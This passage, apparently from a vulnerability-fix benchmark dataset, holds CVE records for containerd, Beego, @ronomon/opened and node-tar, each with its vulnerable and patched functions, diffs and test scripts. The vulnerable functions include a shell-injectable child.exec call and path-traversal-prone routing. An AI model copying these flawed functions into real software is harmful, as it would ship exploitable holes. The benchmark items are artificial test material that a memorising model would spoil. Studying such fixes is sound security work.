username string\n\t\t\tuid, err := strconv.Atoi(userstr)\n\t\t\tif err == nil {\n\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n\t\t\t\t\treturn u.Uid == uid\n\t\t\t\t})\n\t\t\t\tif err != nil {\n\t\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t}\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tusername = user.Name\n\t\t\t} else {\n\t\t\t\tusername = userstr\n\t\t\t}\n\t\t\tgids, err := getSupplementalGroupsFromPath(root, func(g user.Group) bool {\n\t\t\t\t// we only want supplemental groups\n\t\t\t\tif g.Name == username {\n\t\t\t\t\treturn false\n\t\t\t\t}\n\t\t\t\tfor _, entry := range g.List {\n\t\t\t\t\tif entry == username {\n\t\t\t\t\t\treturn true\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif os.IsNotExist(err) {\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\t\treturn err\n\t\t\t}\n\t\t\ts.Process.User.AdditionalGids = gids\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !isRootfsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setAdditionalGids(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n\t}\n}"}, {"id": "fix_go_52_7", "commit": "133f6bb6cd827ce35a5fb279c1ead12b9d21460a", "file_path": "oci/spec_opts.go", "start_line": 812, "end_line": 870, "snippet": "func WithAppendAdditionalGroups(groups ...string) SpecOpts {\n\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n\t\t// For LCOW or on Darwin additional GID's are not supported\n\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n\t\t\treturn nil\n\t\t}\n\t\tsetProcess(s)\n\t\tsetAdditionalGids := func(root string) error {\n\t\t\tdefer ensureAdditionalGids(s)\n\t\t\tgpath, err := fs.RootPath(root, \"/etc/group\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tugroups, err := user.ParseGroupFile(gpath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tgroupMap := make(map[string]user.Group)\n\t\t\tfor _, group := range ugroups {\n\t\t\t\tgroupMap[group.Name] = group\n\t\t\t}\n\t\t\tvar gids []uint32\n\t\t\tfor _, group := range groups {\n\t\t\t\tgid, err := strconv.ParseUint(group, 10, 32)\n\t\t\t\tif err == nil {\n\t\t\t\t\tgids = append(gids, uint32(gid))\n\t\t\t\t} else {\n\t\t\t\t\tg, ok := groupMap[group]\n\t\t\t\t\tif !ok {\n\t\t\t\t\t\treturn fmt.Errorf(\"unable to find group %s\", group)\n\t\t\t\t\t}\n\t\t\t\t\tgids = append(gids, uint32(g.Gid))\n\t\t\t\t}\n\t\t\t}\n\t\t\ts.Process.User.AdditionalGids = append(s.Process.User.AdditionalGids, gids...)\n\t\t\treturn nil\n\t\t}\n\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n\t\t\tif !filepath.IsAbs(s.Root.Path) {\n\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n\t\t\t}\n\t\t\treturn setAdditionalGids(s.Root.Path)\n\t\t}\n\t\tif c.Snapshotter == \"\" {\n\t\t\treturn errors.New(\"no snapshotter set for container\")\n\t\t}\n\t\tif c.SnapshotKey == \"\" {\n\t\t\treturn errors.New(\"rootfs snapshot not created for 
container\")\n\t\t}\n\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tmounts = tryReadonlyMounts(mounts)\n\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n\t}\n}"}], "vul_patch": "--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,6 +1,8 @@\n func WithUser(userstr string) SpecOpts {\n \treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) error {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \n \t\t// For LCOW it's a bit harder to confirm that the user actually exists on the host as a rootfs isn't\n \t\t// mounted on the host and shared into the guest, but rather the rootfs is constructed entirely in the\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,6 +1,8 @@\n func WithUIDGID(uid, gid uint32) SpecOpts {\n \treturn func(_ context.Context, _ Client, _ *containers.Container, s *Spec) error {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \t\ts.Process.User.UID = uid\n \t\ts.Process.User.GID = gid\n \t\treturn nil\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,11 +1,10 @@\n func WithUserID(uid uint32) SpecOpts {\n \treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n-\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n-\t\t\tif !isRootfsAbs(s.Root.Path) {\n-\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n-\t\t\t}\n-\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n+\t\ts.Process.User.AdditionalGids = nil\n+\t\tsetUser := func(root string) error {\n+\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n \t\t\t\treturn u.Uid == int(uid)\n \t\t\t})\n \t\t\tif err != nil {\n@@ -17,7 +16,12 @@\n \t\t\t}\n \t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n \t\t\treturn nil\n-\n+\t\t}\n+\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n+\t\t\tif !isRootfsAbs(s.Root.Path) {\n+\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n+\t\t\t}\n+\t\t\treturn setUser(s.Root.Path)\n \t\t}\n \t\tif c.Snapshotter == \"\" {\n \t\t\treturn errors.New(\"no snapshotter set for container\")\n@@ -32,19 +36,6 @@\n \t\t}\n \n \t\tmounts = tryReadonlyMounts(mounts)\n-\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n-\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n-\t\t\t\treturn u.Uid == int(uid)\n-\t\t\t})\n-\t\t\tif err != nil {\n-\t\t\t\tif os.IsNotExist(err) || err == ErrNoUsersFound {\n-\t\t\t\t\ts.Process.User.UID, s.Process.User.GID = uid, 0\n-\t\t\t\t\treturn nil\n-\t\t\t\t}\n-\t\t\t\treturn err\n-\t\t\t}\n-\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n-\t\t\treturn nil\n-\t\t})\n+\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n \t}\n }\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -1,12 +1,11 @@\n func WithUsername(username string) SpecOpts {\n \treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n+\t\tdefer ensureAdditionalGids(s)\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \t\tif s.Linux != nil {\n-\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n-\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n-\t\t\t\t\treturn errors.New(\"rootfs absolute path is 
required\")\n-\t\t\t\t}\n-\t\t\t\tuser, err := UserFromPath(s.Root.Path, func(u user.User) bool {\n+\t\t\tsetUser := func(root string) error {\n+\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n \t\t\t\t\treturn u.Name == username\n \t\t\t\t})\n \t\t\t\tif err != nil {\n@@ -14,6 +13,12 @@\n \t\t\t\t}\n \t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n \t\t\t\treturn nil\n+\t\t\t}\n+\t\t\tif c.Snapshotter == \"\" && c.SnapshotKey == \"\" {\n+\t\t\t\tif !isRootfsAbs(s.Root.Path) {\n+\t\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n+\t\t\t\t}\n+\t\t\t\treturn setUser(s.Root.Path)\n \t\t\t}\n \t\t\tif c.Snapshotter == \"\" {\n \t\t\t\treturn errors.New(\"no snapshotter set for container\")\n@@ -28,16 +33,7 @@\n \t\t\t}\n \n \t\t\tmounts = tryReadonlyMounts(mounts)\n-\t\t\treturn mount.WithTempMount(ctx, mounts, func(root string) error {\n-\t\t\t\tuser, err := UserFromPath(root, func(u user.User) bool {\n-\t\t\t\t\treturn u.Name == username\n-\t\t\t\t})\n-\t\t\t\tif err != nil {\n-\t\t\t\t\treturn err\n-\t\t\t\t}\n-\t\t\t\ts.Process.User.UID, s.Process.User.GID = uint32(user.Uid), uint32(user.Gid)\n-\t\t\t\treturn nil\n-\t\t\t})\n+\t\t\treturn mount.WithTempMount(ctx, mounts, setUser)\n \t\t} else if s.Windows != nil {\n \t\t\ts.Process.User.Username = username\n \t\t} else {\n\n--- a/oci/spec_opts.go\n+++ b/oci/spec_opts.go\n@@ -5,7 +5,9 @@\n \t\t\treturn nil\n \t\t}\n \t\tsetProcess(s)\n+\t\ts.Process.User.AdditionalGids = nil\n \t\tsetAdditionalGids := func(root string) error {\n+\t\t\tdefer ensureAdditionalGids(s)\n \t\t\tvar username string\n \t\t\tuid, err := strconv.Atoi(userstr)\n \t\t\tif err == nil {\n\n--- /dev/null\n+++ b/oci/spec_opts.go\n@@ -0,0 +1,10 @@\n+// ensureAdditionalGids ensures that the primary GID is also included in the additional GID list.\n+func ensureAdditionalGids(s *Spec) {\n+\tsetProcess(s)\n+\tfor _, f := range s.Process.User.AdditionalGids {\n+\t\tif f == s.Process.User.GID {\n+\t\t\treturn\n+\t\t}\n+\t}\n+\ts.Process.User.AdditionalGids = append([]uint32{s.Process.User.GID}, s.Process.User.AdditionalGids...)\n+}\n\n--- /dev/null\n+++ b/oci/spec_opts.go\n@@ -0,0 +1,59 @@\n+func WithAppendAdditionalGroups(groups ...string) SpecOpts {\n+\treturn func(ctx context.Context, client Client, c *containers.Container, s *Spec) (err error) {\n+\t\t// For LCOW or on Darwin additional GID's are not supported\n+\t\tif s.Windows != nil || runtime.GOOS == \"darwin\" {\n+\t\t\treturn nil\n+\t\t}\n+\t\tsetProcess(s)\n+\t\tsetAdditionalGids := func(root string) error {\n+\t\t\tdefer ensureAdditionalGids(s)\n+\t\t\tgpath, err := fs.RootPath(root, \"/etc/group\")\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tugroups, err := user.ParseGroupFile(gpath)\n+\t\t\tif err != nil {\n+\t\t\t\treturn err\n+\t\t\t}\n+\t\t\tgroupMap := make(map[string]user.Group)\n+\t\t\tfor _, group := range ugroups {\n+\t\t\t\tgroupMap[group.Name] = group\n+\t\t\t}\n+\t\t\tvar gids []uint32\n+\t\t\tfor _, group := range groups {\n+\t\t\t\tgid, err := strconv.ParseUint(group, 10, 32)\n+\t\t\t\tif err == nil {\n+\t\t\t\t\tgids = append(gids, uint32(gid))\n+\t\t\t\t} else {\n+\t\t\t\t\tg, ok := groupMap[group]\n+\t\t\t\t\tif !ok {\n+\t\t\t\t\t\treturn fmt.Errorf(\"unable to find group %s\", group)\n+\t\t\t\t\t}\n+\t\t\t\t\tgids = append(gids, uint32(g.Gid))\n+\t\t\t\t}\n+\t\t\t}\n+\t\t\ts.Process.User.AdditionalGids = append(s.Process.User.AdditionalGids, gids...)\n+\t\t\treturn nil\n+\t\t}\n+\t\tif c.Snapshotter == \"\" && 
c.SnapshotKey == \"\" {\n+\t\t\tif !filepath.IsAbs(s.Root.Path) {\n+\t\t\t\treturn errors.New(\"rootfs absolute path is required\")\n+\t\t\t}\n+\t\t\treturn setAdditionalGids(s.Root.Path)\n+\t\t}\n+\t\tif c.Snapshotter == \"\" {\n+\t\t\treturn errors.New(\"no snapshotter set for container\")\n+\t\t}\n+\t\tif c.SnapshotKey == \"\" {\n+\t\t\treturn errors.New(\"rootfs snapshot not created for container\")\n+\t\t}\n+\t\tsnapshotter := client.SnapshotService(c.Snapshotter)\n+\t\tmounts, err := snapshotter.Mounts(ctx, c.SnapshotKey)\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n+\n+\t\tmounts = tryReadonlyMounts(mounts)\n+\t\treturn mount.WithTempMount(ctx, mounts, setAdditionalGids)\n+\t}\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25173:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/containerd\nrm -rf ./oci/spec_opts_linux_test.go\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestWithAdditionalGIDs$ github.com/containerd/containerd/oci\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-25173:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/containerd\ngit apply --whitespace=nowarn /workspace/fix.patch\ncd oci && go test -timeout 30s github.com/containerd/containerd/oci\n"} {"cve_id": "CVE-2022-31836", "cve_description": "The leafInfo.match() function in Beego v2.0.3 and below uses path.join() to deal with wildcardvalues which can lead to cross directory risk.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/beego/beego", "patch_url": ["https://github.com/beego/beego/commit/809c0b46acd013159afd19961a8e02c93df6e9e2"], "programing_language": "Go", "vul_func": [{"id": "vul_go_154_1", "commit": "c143120", "file_path": "server/web/tree.go", "start_line": 284, "end_line": 290, "snippet": "func (t *Tree) Match(pattern string, ctx *context.Context) (runObject interface{}) {\n\tif pattern == \"\" || pattern[0] != '/' {\n\t\treturn nil\n\t}\n\tw := make([]string, 0, 20)\n\treturn t.match(pattern[1:], pattern, w, ctx)\n}"}], "fix_func": [{"id": "fix_go_154_1", "commit": "809c0b4", "file_path": "server/web/tree.go", "start_line": 284, "end_line": 292, "snippet": "func (t *Tree) Match(pattern string, ctx *context.Context) (runObject interface{}) {\n\t// fix issue 4961, deal with \"./ ../ //\"\n\tpattern = path.Clean(pattern)\n\tif pattern == \"\" || pattern[0] != '/' {\n\t\treturn nil\n\t}\n\tw := make([]string, 0, 20)\n\treturn t.match(pattern[1:], pattern, w, ctx)\n}"}], "vul_patch": "--- a/server/web/tree.go\n+++ b/server/web/tree.go\n@@ -1,4 +1,6 @@\n func (t *Tree) Match(pattern string, ctx *context.Context) (runObject interface{}) {\n+\t// fix issue 4961, deal with \"./ ../ //\"\n+\tpattern = path.Clean(pattern)\n \tif pattern == \"\" || pattern[0] != '/' {\n \t\treturn nil\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-29300", "cve_description": "The @ronomon/opened library before 1.5.2 is vulnerable to a command injection vulnerability which would allow a remote 
attacker to execute commands on the system if the library was used with untrusted input.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/ronomon/opened", "patch_url": ["https://github.com/ronomon/opened/commit/7effe011d4fea8fac7f78c00615e0a6e69af68ec"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_191_1", "commit": "33c2dfb", "file_path": "index.js", "start_line": 75, "end_line": 112, "snippet": "Unix.files = function(paths, end) {\n var self = this;\n assertPaths('paths', paths);\n assertFunction('end', end);\n var files = {};\n var queue = new Queue(1); // Concurrency yields no improvement with lsof.\n queue.onData = function(paths, end) {\n var escapedPaths = paths.map(\n function(path) {\n return '\"' + path.replace(/\"/g, '\\\\\"') + '\"';\n }\n );\n var command = 'lsof -F n -- ' + escapedPaths.join(' ');\n var options = {\n encoding: 'utf-8',\n maxBuffer: 2 * 1024 * 1024\n };\n Node.child.exec(command, options,\n function(error, stdout, stderr) {\n // lsof returns an error and a status code of 1 if a file is not open:\n if (error && error.code === 1 && stderr.length === 0) error = undefined;\n if (error) {\n if (/No such file or directory/i.test(stderr)) {\n error.code = 'ENOENT';\n }\n return end(error);\n }\n var lines = stdout.split('\\n');\n for (var index = 0, length = lines.length; index < length; index++) {\n var line = lines[index];\n if (line[0] != 'n') continue;\n var candidate = self.unescape(line.slice(1));\n if (files.hasOwnProperty(candidate)) files[candidate] = true;\n }\n end();\n }\n );\n };"}], "fix_func": [{"id": "fix_js_191_1", "commit": "7effe01", "file_path": "index.js", "start_line": 75, "end_line": 108, "snippet": "Unix.files = function(paths, end) {\n var self = this;\n assertPaths('paths', paths);\n assertFunction('end', end);\n var files = {};\n var queue = new Queue(1); // Concurrency yields no improvement with lsof.\n queue.onData = function(paths, end) {\n var command = 'lsof';\n var args = ['-F', 'n', '--'].concat(paths);\n var options = {\n encoding: 'utf-8',\n maxBuffer: 2 * 1024 * 1024\n };\n Node.child.execFile(command, args, options,\n function(error, stdout, stderr) {\n // lsof returns an error and a status code of 1 if a file is not open:\n if (error && error.code === 1 && stderr.length === 0) error = undefined;\n if (error) {\n if (/No such file or directory/i.test(stderr)) {\n error.code = 'ENOENT';\n }\n 
return end(error);\n }\n var lines = stdout.split('\\n');\n for (var index = 0, length = lines.length; index < length; index++) {\n var line = lines[index];\n if (line[0] != 'n') continue;\n var candidate = self.unescape(line.slice(1));\n if (files.hasOwnProperty(candidate)) files[candidate] = true;\n }\n end();\n }\n );\n };"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -5,17 +5,13 @@\n var files = {};\n var queue = new Queue(1); // Concurrency yields no improvement with lsof.\n queue.onData = function(paths, end) {\n- var escapedPaths = paths.map(\n- function(path) {\n- return '\"' + path.replace(/\"/g, '\\\\\"') + '\"';\n- }\n- );\n- var command = 'lsof -F n -- ' + escapedPaths.join(' ');\n+ var command = 'lsof';\n+ var args = ['-F', 'n', '--'].concat(paths);\n var options = {\n encoding: 'utf-8',\n maxBuffer: 2 * 1024 * 1024\n };\n- Node.child.exec(command, options,\n+ Node.child.execFile(command, args, options,\n function(error, stdout, stderr) {\n // lsof returns an error and a status code of 1 if a file is not open:\n if (error && error.code === 1 && stderr.length === 0) error = undefined;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-37712", "cve_description": "The npm package \"tar\" (aka node-tar) before versions 4.4.18, 5.0.10, and 6.1.9 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created. This logic was insufficient when extracting tar files that contained both a directory and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 \"short path\" counterparts. A specially crafted tar archive could thus include a directory with one form of the path, followed by a symbolic link with a different string that resolves to the same file system entity, followed by a file using the first form. By first creating a directory, and then replacing that directory with a symlink that had a different apparent name that resolved to the same entry in the filesystem, it was thus possible to bypass node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite. These issues were addressed in releases 4.4.18, 5.0.10 and 6.1.9. The v3 branch of node-tar has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of node-tar. 
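The @ronomon/opened patch above swaps `child.exec` (a shell-parsed command string with hand-rolled quoting) for `child.execFile` (an argv array). The quoting it replaced escaped only `"`, leaving backticks and `$(...)` live inside double quotes, which is the injection vector. The same distinction sketched in Python, with the dangerous form left commented out on purpose:

```python
import subprocess

# A hostile "path" that a shell would happily execute as a command:
paths = ["/tmp/a.txt", "$(touch /tmp/pwned).txt"]

# Vulnerable shape (mirrors the exec() call above): one string, parsed by a
# shell, so $(...) inside a filename runs.
# subprocess.run("lsof -F n -- " + " ".join(paths), shell=True)

# Fixed shape (mirrors execFile): program plus argv list, no shell involved,
# so the payload reaches lsof as a literal file name.
try:
    subprocess.run(["lsof", "-F", "n", "--"] + paths,
                   capture_output=True, text=True)
except FileNotFoundError:
    pass  # lsof not installed; the point is the argv-vs-string distinction
```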
If this is not possible, a workaround is available in the referenced GHSA-qq89-hq3f-393p.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/isaacs/node-tar", "patch_url": ["https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b", "https://github.com/isaacs/node-tar/commit/2f1bca027286c23e110b8dfc7efc10756fa3db5a", "https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455", "https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e", "https://github.com/isaacs/node-tar/commit/3aaf19b2501bbddb145d92b3322c80dcaed3c35f", "https://github.com/isaacs/node-tar/commit/d56f790bda9fea807dd80c5083f24771dbdd6eb1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_56_1", "commit": "d56f790bda9fea807dd80c5083f24771dbdd6eb1", "file_path": "lib/path-reservations.js", "start_line": 13, "end_line": 128, "snippet": "module.exports = () => {\n // path => [function or Set]\n // A Set object means a directory reservation\n // A fn is a direct reservation on that path\n const queues = new Map()\n\n // fn => {paths:[path,...], dirs:[path, ...]}\n const reservations = new Map()\n\n // return a set of parent dirs for a given path\n const getDirs = path =>\n path.split('/').slice(0, -1).reduce((set, path) =>\n set.length ? 
set.concat(normPath(join(set[set.length - 1], path)))\n : [path], [])\n\n // functions currently running\n const running = new Set()\n\n // return the queues for each path the function cares about\n // fn => {paths, dirs}\n const getQueues = fn => {\n const res = reservations.get(fn)\n /* istanbul ignore if - unpossible */\n if (!res)\n throw new Error('function does not have any path reservations')\n return {\n paths: res.paths.map(path => queues.get(path)),\n dirs: [...res.dirs].map(path => queues.get(path)),\n }\n }\n\n // check if fn is first in line for all its paths, and is\n // included in the first set for all its dir queues\n const check = fn => {\n const {paths, dirs} = getQueues(fn)\n return paths.every(q => q[0] === fn) &&\n dirs.every(q => q[0] instanceof Set && q[0].has(fn))\n }\n\n // run the function if it's first in line and not already running\n const run = fn => {\n if (running.has(fn) || !check(fn))\n return false\n running.add(fn)\n fn(() => clear(fn))\n return true\n }\n\n const clear = fn => {\n if (!running.has(fn))\n return false\n\n const { paths, dirs } = reservations.get(fn)\n const next = new Set()\n\n paths.forEach(path => {\n const q = queues.get(path)\n assert.equal(q[0], fn)\n if (q.length === 1)\n queues.delete(path)\n else {\n q.shift()\n if (typeof q[0] === 'function')\n next.add(q[0])\n else\n q[0].forEach(fn => next.add(fn))\n }\n })\n\n dirs.forEach(dir => {\n const q = queues.get(dir)\n assert(q[0] instanceof Set)\n if (q[0].size === 1 && q.length === 1) {\n queues.delete(dir)\n } else if (q[0].size === 1) {\n q.shift()\n\n // must be a function or else the Set would've been reused\n next.add(q[0])\n } else\n q[0].delete(fn)\n })\n running.delete(fn)\n\n next.forEach(fn => run(fn))\n return true\n }\n\n const reserve = (paths, fn) => {\n paths = paths.map(p => normPath(join(p)).toLowerCase())\n const dirs = new Set(\n paths.map(path => getDirs(path)).reduce((a, b) => a.concat(b))\n )\n reservations.set(fn, {dirs, paths})\n paths.forEach(path => {\n const q = queues.get(path)\n if (!q)\n queues.set(path, [fn])\n else\n q.push(fn)\n })\n dirs.forEach(dir => {\n const q = queues.get(dir)\n if (!q)\n queues.set(dir, [new Set([fn])])\n else if (q[q.length-1] instanceof Set)\n q[q.length-1].add(fn)\n else\n q.push(new Set([fn]))\n })\n\n return run(fn)\n }\n\n return { check, reserve }\n}"}], "fix_func": [{"id": "fix_js_56_1", "commit": "1739408d3122af897caefd09662bce2ea477533b", "file_path": "lib/path-reservations.js", "start_line": 17, "end_line": 149, "snippet": "module.exports = () => {\n // path => [function or Set]\n // A Set object means a directory reservation\n // A fn is a direct reservation on that path\n const queues = new Map()\n\n // fn => {paths:[path,...], dirs:[path, ...]}\n const reservations = new Map()\n\n // return a set of parent dirs for a given path\n // '/a/b/c/d' -> ['/', '/a', '/a/b', '/a/b/c', '/a/b/c/d']\n const getDirs = path => {\n const dirs = path.split('/').slice(0, -1).reduce((set, path) => {\n if (set.length)\n path = normPath(join(set[set.length - 1], path))\n set.push(path || '/')\n return set\n }, [])\n return dirs\n }\n\n // functions currently running\n const running = new Set()\n\n // return the queues for each path the function cares about\n // fn => {paths, dirs}\n const getQueues = fn => {\n const res = reservations.get(fn)\n /* istanbul ignore if - unpossible */\n if (!res)\n throw new Error('function does not have any path reservations')\n return {\n paths: res.paths.map(path => queues.get(path)),\n dirs: 
[...res.dirs].map(path => queues.get(path)),\n }\n }\n\n // check if fn is first in line for all its paths, and is\n // included in the first set for all its dir queues\n const check = fn => {\n const {paths, dirs} = getQueues(fn)\n return paths.every(q => q[0] === fn) &&\n dirs.every(q => q[0] instanceof Set && q[0].has(fn))\n }\n\n // run the function if it's first in line and not already running\n const run = fn => {\n if (running.has(fn) || !check(fn))\n return false\n running.add(fn)\n fn(() => clear(fn))\n return true\n }\n\n const clear = fn => {\n if (!running.has(fn))\n return false\n\n const { paths, dirs } = reservations.get(fn)\n const next = new Set()\n\n paths.forEach(path => {\n const q = queues.get(path)\n assert.equal(q[0], fn)\n if (q.length === 1)\n queues.delete(path)\n else {\n q.shift()\n if (typeof q[0] === 'function')\n next.add(q[0])\n else\n q[0].forEach(fn => next.add(fn))\n }\n })\n\n dirs.forEach(dir => {\n const q = queues.get(dir)\n assert(q[0] instanceof Set)\n if (q[0].size === 1 && q.length === 1) {\n queues.delete(dir)\n } else if (q[0].size === 1) {\n q.shift()\n\n // must be a function or else the Set would've been reused\n next.add(q[0])\n } else\n q[0].delete(fn)\n })\n running.delete(fn)\n\n next.forEach(fn => run(fn))\n return true\n }\n\n const reserve = (paths, fn) => {\n // collide on matches across case and unicode normalization\n // On windows, thanks to the magic of 8.3 shortnames, it is fundamentally\n // impossible to determine whether two paths refer to the same thing on\n // disk, without asking the kernel for a shortname.\n // So, we just pretend that every path matches every other path here,\n // effectively removing all parallelization on windows.\n paths = isWindows ? ['win32 parallelization disabled'] : paths.map(p => {\n return stripSlashes(normPath(join(p)))\n .normalize('NFKD')\n .toLowerCase()\n })\n\n const dirs = new Set(\n paths.map(path => getDirs(path)).reduce((a, b) => a.concat(b))\n )\n reservations.set(fn, {dirs, paths})\n paths.forEach(path => {\n const q = queues.get(path)\n if (!q)\n queues.set(path, [fn])\n else\n q.push(fn)\n })\n dirs.forEach(dir => {\n const q = queues.get(dir)\n if (!q)\n queues.set(dir, [new Set([fn])])\n else if (q[q.length-1] instanceof Set)\n q[q.length-1].add(fn)\n else\n q.push(new Set([fn]))\n })\n\n return run(fn)\n }\n\n return { check, reserve }\n}"}, {"id": "fix_js_56_2", "commit": "1739408d3122af897caefd09662bce2ea477533b", "file_path": "lib/path-reservations.js", "start_line": 14, "end_line": 15, "snippet": "const platform = process.env.TESTING_TAR_FAKE_PLATFORM || process.platform\nconst isWindows = platform === 'win32'"}], "vul_patch": "--- a/lib/path-reservations.js\n+++ b/lib/path-reservations.js\n@@ -8,10 +8,16 @@\n const reservations = new Map()\n \n // return a set of parent dirs for a given path\n- const getDirs = path =>\n- path.split('/').slice(0, -1).reduce((set, path) =>\n- set.length ? 
